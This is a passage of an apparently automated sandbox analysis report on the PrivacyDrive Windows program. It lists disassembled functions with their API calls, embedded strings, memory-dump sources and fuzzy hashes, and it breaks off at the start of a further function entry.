                                • GdipMeasureString.GDIPLUS(00000000,?,000000FF,00000000,?,00000000,00000000,?,?), ref: 0041A87D
                                • ReleaseDC.USER32(00000000,00000000), ref: 0041A88E
                                • GdipDeleteStringFormat.GDIPLUS(00000000), ref: 0041A8AC
                                • GdipDeleteGraphics.GDIPLUS(00000000), ref: 0041A8BA
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$String$Format$CreateDelete$FromGraphicsHintMeasureReleaseRenderingTextTrimming
                                • String ID:
                                • API String ID: 153191451-0
                                • Opcode ID: 5844a7fc248f398f4e4756010655fb98f439cc8e48f55539702864a97a99885b
                                • Instruction ID: 41d104d89a2a550782616ac7e2857eb16365c0e93b9f0b62b7e1e99a0633de65
                                • Opcode Fuzzy Hash: 5844a7fc248f398f4e4756010655fb98f439cc8e48f55539702864a97a99885b
                                • Instruction Fuzzy Hash: 93413C72A00308EFEB01CFA5DC58BEEBBB8FB59711F10421AE911B7290EB755944DB64
                                Function 00431940 Relevance: 13.6, APIs: 9, Instructions: 76synchronizationthreadwindowCOMMON
                                Download Yara Rule
                                APIs
                                • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0043195D
                                • CreateThread.KERNEL32(00000000,00000000,Function_00031890,00000000,00000000,00000000), ref: 00431980
                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00431999
                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004319A9
                                • PostThreadMessageW.USER32(?,00000466,00000000,00000000), ref: 004319D7
                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004319E1
                                • PostMessageA.USER32(00000000), ref: 004319FC
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00431A07
                                • CloseHandle.KERNEL32(?), ref: 00431A0D
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ObjectSingleWait$CreateMessagePostThread$CloseEventHandle
                                • String ID:
                                • API String ID: 439857621-0
                                • Opcode ID: b7d0fa7f5be62e31129a1dc0d245f2a881528ce9d1fd1e3e293f5516e472c95f
                                • Instruction ID: f64bf624381ee92e46cb07f6cf6e2c58ad401747612f4ba90984a1bfad036376
                                • Opcode Fuzzy Hash: b7d0fa7f5be62e31129a1dc0d245f2a881528ce9d1fd1e3e293f5516e472c95f
                                • Instruction Fuzzy Hash: 9921C875640304BBEB209FA4CC05FAB77B4FF05721F104625F665A62E0CBB56904DB54
                                Function 0042BA80 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 246windowCOMMON
                                Download Yara Rule
                                APIs
                                • MessageBoxW.USER32(00000000,Failed to initialize Hash algorithms library!,Error,00000000), ref: 0042BE91
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Message
                                • String ID: !@$%02X$Error$Failed to initialize Hash algorithms library!$[ %u ] $sha512
                                • API String ID: 2030045667-1952778553
                                • Opcode ID: 28e414ebb50535f0594b185df9f13bd8f991b6176998a28923e9ed53f8c4f2da
                                • Instruction ID: 091f596372a404d4d97e4d58a6476940ffa6c945c863458762611e3b93a7fdf8
                                • Opcode Fuzzy Hash: 28e414ebb50535f0594b185df9f13bd8f991b6176998a28923e9ed53f8c4f2da
                                • Instruction Fuzzy Hash: 51B1ACB02183809EE320DF64D885B9BBBE4BF85708F404E2DF5D9962C1D7B99508CB97
                                Function 0051B2E0 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 207COMMON
                                Download Yara Rule
                                APIs
                                • _malloc.LIBCMT ref: 0051B360
                                  • Part of subcall function 0052CF10: _fprintf.LIBCMT ref: 0052CF2A
                                  • Part of subcall function 0052CF10: _raise.LIBCMT ref: 0052CF31
                                • _free.LIBCMT ref: 0051B41F
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: _fprintf_free_malloc_raise
                                • String ID: G_C$dp != NULL$key != NULL$ltc_mp.name != NULL$src\pk\ecc\ecc_make_key.c
                                • API String ID: 2491835905-2432424472
                                • Opcode ID: 87869aad49a5f9db2c27e47bcdc1459b3fbfd7df1fa63d6b1aaae5b8d47e28a6
                                • Instruction ID: c6510904cd206698877bf0f0a93d39303303e949e9abeec41f0cd632c6b8c825
                                • Opcode Fuzzy Hash: 87869aad49a5f9db2c27e47bcdc1459b3fbfd7df1fa63d6b1aaae5b8d47e28a6
                                • Instruction Fuzzy Hash: 5071CF3694021AAFEB219F50DC46FDEBBA5BF18314F040551FD14672A2E372AEA49BC1
                                Function 00412050 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 135COMMON
                                Download Yara Rule
                                APIs
                                • _memmove.LIBCMT ref: 004120F9
                                • _memmove.LIBCMT ref: 0041212E
                                • _memmove.LIBCMT ref: 00412165
                                • _memmove.LIBCMT ref: 00412186
                                • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 004121C0
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: _memmove$Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
                                • String ID: &nJ$deque<T> too long
                                • API String ID: 279611364-2875715942
                                • Opcode ID: cd0a0a4a5e4168138cc841e3c8e4ce04ef86546b5a37f16f0dca6030d7293155
                                • Instruction ID: de54a4e7107b52c4245634e6d1b8647f75ed2680f490c29328737f0c368ae0c6
                                • Opcode Fuzzy Hash: cd0a0a4a5e4168138cc841e3c8e4ce04ef86546b5a37f16f0dca6030d7293155
                                • Instruction Fuzzy Hash: 9C41C371A00115ABDB10CF68CD85BAEB77ABF84300F18866AD904E7395D7B5EE15CAE0
                                Function 004EE7E0 Relevance: 12.4, APIs: 8, Instructions: 356COMMON
                                Download Yara Rule
                                APIs
                                • GdipMeasureString.GDIPLUS(?,?,000000FF,00000000,?,?,?,00000000,00000000), ref: 004EE89E
                                • GdipCreateRegion.GDIPLUS(00000000), ref: 004EE928
                                • GdipSetStringFormatMeasurableCharacterRanges.GDIPLUS(?,00000001,?), ref: 004EE98E
                                • GdipGetRegionBounds.GDIPLUS(?,?,?,?,?,?,?,?,?,?), ref: 004EE9DD
                                • GdipSetStringFormatMeasurableCharacterRanges.GDIPLUS(?,00000001,00000000), ref: 004EEA0F
                                • GdipGetRegionBounds.GDIPLUS(?,?,?,?,?,?,?,?,?,?), ref: 004EEA5E
                                • GdipDeleteRegion.GDIPLUS(00000000), ref: 004EED5D
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$Region$String$BoundsCharacterFormatMeasurableRanges$CreateDeleteMeasure
                                • String ID:
                                • API String ID: 3891382466-0
                                • Opcode ID: 56e295ed0bbe2b8691e23db203ca975ee50b6a87b482520bf5b09f2392fedcf6
                                • Instruction ID: 6960a11009b4bb04875be0ce1331bb0f19d576027dd699c8ba19fe3ebc183744
                                • Opcode Fuzzy Hash: 56e295ed0bbe2b8691e23db203ca975ee50b6a87b482520bf5b09f2392fedcf6
                                • Instruction Fuzzy Hash: 9BF16C71904749DFD311CF33C844BA7BBE0AFAA305F148B1EF89AA62A0D735A444DB55
                                Function 0040F230 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 96COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: DrivesExecuteLogicalShell_memset
                                • String ID: :\$<$HZ$open
                                • API String ID: 1014424214-864357636
                                • Opcode ID: 9d7b293134f83c8291e39a68c6c5a54b25b585f60e8525cb2d7d4d8adc90c3d8
                                • Instruction ID: eab8e807e8c0203b723bbe86bd1204b7ca5e47fc920744965472b0e7266096ad
                                • Opcode Fuzzy Hash: 9d7b293134f83c8291e39a68c6c5a54b25b585f60e8525cb2d7d4d8adc90c3d8
                                • Instruction Fuzzy Hash: 444159B5D002589FDB30DF58D448B9EBBF4BB04324F08847AE855A7790C778AC49CB44
                                Function 0042C540 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 80filewindowCOMMON
                                Download Yara Rule
                                APIs
                                • OpenFileMappingW.KERNEL32(00000004,00000000,7563D392), ref: 0042C5CB
                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0042C5E0
                                  • Part of subcall function 004210A0: EnterCriticalSection.KERNEL32(005AE198,7563D392,?,00000000,?,?,?,00000000,0053B418,000000FF,?,0042C5F1,00000000), ref: 004210E4
                                  • Part of subcall function 004210A0: LeaveCriticalSection.KERNEL32(005AE198,0042C5F1), ref: 0042113C
                                • PostMessageW.USER32(00000111,000004DC,00000000,00000000), ref: 0042C603
                                • CloseHandle.KERNEL32(00000000), ref: 0042C60A
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalFileSection$CloseEnterHandleLeaveMappingMessageOpenPostView
                                • String ID: !@$%s_Shared_%u$_Privacy Drive
                                • API String ID: 1433164727-916476676
                                • Opcode ID: 0879a008ea770c22e855ba54283b49706a216e68642c972544032f1920504811
                                • Instruction ID: 0679cf7c776a440fcfb53d7d19e9896e3e829f526dbe958e15f183deb233a8a0
                                • Opcode Fuzzy Hash: 0879a008ea770c22e855ba54283b49706a216e68642c972544032f1920504811
                                • Instruction Fuzzy Hash: 7D315C71E01309AFEB10DFA4DD5ABAEBBB4FB09714F104119E611B72D0D7B46A04CBA9
                                Function 00444B10 Relevance: 12.3, APIs: 8, Instructions: 312COMMON
                                Download Yara Rule
                                APIs
                                • GdipDrawImage.GDIPLUS(?,00000000), ref: 00444B86
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?), ref: 00444BA4
                                • GdipCreateSolidFill.GDIPLUS(FF282828,?), ref: 00444BE5
                                • GdipSetStringFormatTrimming.GDIPLUS(?,00000005), ref: 00444C06
                                • GdipSetStringFormatAlign.GDIPLUS(?,00000000,?,?,0056E884,?,?,FF414141,?,?,?,?,?,FF414141), ref: 00444CCA
                                • GdipSetStringFormatAlign.GDIPLUS(?,00000002,?,00000000,?,?,00000064,?,FF414141,?,00000000,?,?,00000050,?,FF414141), ref: 00444DF3
                                  • Part of subcall function 004CC050: GdipCreateSolidFill.GDIPLUS(?,FF414141,7563D392,?,?,?), ref: 004CC0A9
                                  • Part of subcall function 004CC050: GdipDrawString.GDIPLUS(?,?,000000FF,00000000,?,00000000,00000000,?,?,?), ref: 004CC121
                                  • Part of subcall function 004CC050: GdipDrawString.GDIPLUS(?,?,000000FF,00000000,?,00000000,?,?,?,?), ref: 004CC18D
                                • GdipDeleteBrush.GDIPLUS(00000000,?,00000000,?,?,00000064,?,FF414141,?,00000000,?,?,00000050,?,FF414141,?), ref: 00444F18
                                • GdipDeleteStringFormat.GDIPLUS(00000000,?,00000000,?,?,00000064,?,FF414141,?,00000000,?,?,00000050,?,FF414141,?), ref: 00444F2A
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$String$Format$CreateDraw$AlignDeleteFillSolid$BrushImageTrimming
                                • String ID:
                                • API String ID: 1816208350-0
                                • Opcode ID: 8bb4c5b415326a8f66e3ff32312c09ccceafd258d4a0ca0d14d25e5d9f3b20ce
                                • Instruction ID: 618bb39d0e569f55146f4b341f5b4325fd5543f0e65debef94d08a7a2b146bf4
                                • Opcode Fuzzy Hash: 8bb4c5b415326a8f66e3ff32312c09ccceafd258d4a0ca0d14d25e5d9f3b20ce
                                • Instruction Fuzzy Hash: 47D13374204702EFD705CF28C888F5ABBE5FB89709F004A59F5499B2A0D730E958CFA6
                                Function 004D4420 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 53windowsleepCOMMON
                                Download Yara Rule
                                APIs
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004D4440
                                • TranslateMessage.USER32(?), ref: 004D4460
                                • DispatchMessageW.USER32(?), ref: 004D446A
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004D4487
                                • Sleep.KERNEL32(0000000A,?,?,?,?,?,0048713B,00000000), ref: 004D448F
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Message$Peek$DispatchSleepTranslate
                                • String ID: ;qH$p
                                • API String ID: 1762048999-473232785
                                • Opcode ID: f58ef8469eff10d2f914f8aad31ddb322e29a2d08602e4613d45bf7f597cdda2
                                • Instruction ID: d62f21865f6b4206632e844090aad53f0a173fa2481c5afc4479ddcbee22977a
                                • Opcode Fuzzy Hash: f58ef8469eff10d2f914f8aad31ddb322e29a2d08602e4613d45bf7f597cdda2
                                • Instruction Fuzzy Hash: E801D231A0030AABEF20DBD4CC59FAFB77CAB54711F100027F600A7280D7B89985CBA5
                                Function 0042B9F0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 37COMMON
                                Download Yara Rule
                                APIs
                                • GetDesktopWindow.USER32 ref: 0042B9F7
                                • GetWindow.USER32(00000000), ref: 0042B9FE
                                • IsWindow.USER32(00000000), ref: 0042BA07
                                • GetPropW.USER32(00000000,Privacy Drive Std Dialog Activation), ref: 0042BA19
                                • GetWindow.USER32(00000000,00000002), ref: 0042BA22
                                • IsWindow.USER32(00000000), ref: 0042BA2B
                                Strings
                                • Privacy Drive Std Dialog Activation, xrefs: 0042BA17
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Window$DesktopProp
                                • String ID: Privacy Drive Std Dialog Activation
                                • API String ID: 4103027390-1971693912
                                • Opcode ID: 304330b4fce219b0a2c628730024bd0146bde42fa2949f47ea2b00681a8dacd3
                                • Instruction ID: 4e7b4396d563f7ed38e58366eb971fbc7313f52415f00e04d6790436c6ec6a30
                                • Opcode Fuzzy Hash: 304330b4fce219b0a2c628730024bd0146bde42fa2949f47ea2b00681a8dacd3
                                • Instruction Fuzzy Hash: E0F01C733013216BE7112BB57C58E6B679CEB667A3F464826F900D2220D72C8C056BA4
                                Function 0041D260 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 29servicesleepCOMMON
                                Download Yara Rule
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 0041D26A
                                • OpenServiceW.ADVAPI32(00000000,PrivacyDrive,000F01FF), ref: 0041D282
                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0041D2AF
                                  • Part of subcall function 0041CD20: QueryServiceStatus.ADVAPI32(?,?), ref: 0041CD38
                                  • Part of subcall function 0041CD20: ControlService.ADVAPI32(?,00000001,?,?,?,?,?), ref: 0041CD51
                                  • Part of subcall function 0041CD20: QueryServiceStatus.ADVAPI32(?,?,?,00000001,?,?,?,?,?), ref: 0041CD65
                                  • Part of subcall function 0041CD20: Sleep.KERNEL32(000000FA,?,?,?,00000001,?,?,?,?,?), ref: 0041CD7A
                                • DeleteService.ADVAPI32(00000000), ref: 0041D296
                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0041D29D
                                • Sleep.KERNEL32(000001F4), ref: 0041D2A8
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Service$CloseHandleOpenQuerySleepStatus$ControlDeleteManager
                                • String ID: PrivacyDrive
                                • API String ID: 2902594379-2858902902
                                • Opcode ID: b7f325f3bfbd810a1f2e0680401061688caf6168ddcf4e552caa1c0c08904fc8
                                • Instruction ID: 5e77515d9f14e2b06fcdb4c57ff0665284db3787b4d3b28e4904b0e3bdef38ce
                                • Opcode Fuzzy Hash: b7f325f3bfbd810a1f2e0680401061688caf6168ddcf4e552caa1c0c08904fc8
                                • Instruction Fuzzy Hash: A6E0653668271167C22227606C1DBBF39359FA6B53F040115F605951F58F688445E765
                                Function 0041D2C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 29servicesleepCOMMON
                                Download Yara Rule
                                APIs
